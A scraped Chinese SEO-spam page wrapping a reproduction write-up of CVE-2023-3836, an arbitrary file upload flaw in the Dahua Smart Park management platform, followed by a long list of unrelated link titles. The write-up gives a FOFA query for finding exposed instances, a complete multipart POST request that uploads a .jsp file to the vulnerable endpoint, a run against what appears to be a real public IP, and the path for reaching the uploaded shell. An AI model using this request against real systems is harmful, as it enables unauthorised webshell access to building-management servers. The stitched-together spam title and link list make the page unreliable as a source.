当前位置: 首页 > news >正文

玉田网站制作南平网站seo

news 2025/7/3 17:23:27
玉田网站制作,南平网站seo,想看别人的wordpress博客网站,天津企商网站建设公司文章目录 CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现0x01 前言0x02 漏洞描述0x03 影响范围0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现 0x01 前言 免责声…

文章目录

  • CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响范围
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现

CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

在大华智慧园区管理中发现了一个被归类为严重的漏洞,最高可达20230713。此漏洞影响文件 /emap/devicePoint_addImgIco?hasSubsystem=true 的未知代码。对参数上传的操作会导致无限制上传。攻击可以远程发起。该漏洞已向公众披露,并可能被使用。
在这里插入图片描述

0x03 影响范围

大华智慧园区综合管理平台

0x04 漏洞环境

fofa:“/WPMS/asset/lib/gridster/”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC (POST)

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: ip:port
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Length: 228
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="***.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary******
--f3aeb22be281d77542546a2f71e20982--

3.复现

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: 202.96.139.59:9080
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Length: 228
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary123456
--f3aeb22be281d77542546a2f71e20982--

在这里插入图片描述访问上传文件
shell地址链接:

http://127.0.0.1/upload/emap/society_new/ico_res_**********.jsp

注意:ico_res_**********.jsp 替换成上传数据包回显的文件名
在这里插入图片描述

http://www.hrbkazy.com/news/3500.html

相关文章:

  • 网站首页的滚动图片怎么做的域名推荐
  • 哪个网站音乐做的最好小学生班级优化大师
  • 山东网站建设开发维护雅思培训班价格一览表
  • 网站建设专员上海seo优化服务公司
  • 除了凡科建站还有什么网站吗深圳20网络推广
  • 如何做阿里巴巴的网站营销型网站建设公司
  • 网站后台管理系统 静态页面怎么做好销售
  • 网站登录页做多大尺寸的网络营销工具体系
  • 求职招聘网站排名前十名今日新闻最新头条
  • 网页美工设计实训seo是什么意思蜘蛛屯
  • 南充个人急售二手房谷歌官方seo入门指南
  • 免费宣传单设计模板青岛seo网站建设公司
  • 网站建设分金手指排名四爱站工具包手机版
  • 在线制作图片的网站软文推广媒体
  • 深圳专业网站开发swot分析
  • 宝塔面板做网站不能打开PHP显示404福建seo关键词优化外包
  • 可以做网站的公司常州seo第一人
  • 内部网站可以做ipc备案海外广告投放公司
  • 营销型单页网站霸榜seo
  • 电子商务网站建设报告分析百度怎么做自己的网页
  • 青岛 两学一做 网站环球军事新闻最新消息
  • 自建网站模板如何联系百度人工客服电话
  • oa办公系统软件多少钱百度seo关键词排名优化教程
  • 请问大连谁家做网站什么网站百度收录快
  • 盘锦门户网站制作今天上海最新新闻事件
  • 重庆大渡口营销型网站建设公司推荐排名优化网站
  • 中国建设工程造价管理协会网站招聘推广计划书怎么写
  • 我想做个网站 详解怎么做seo算法是什么
  • 做网站用哪个office阿里云域名注册入口官网
  • 凤岗镇网站仿做网站怎么快速被百度收录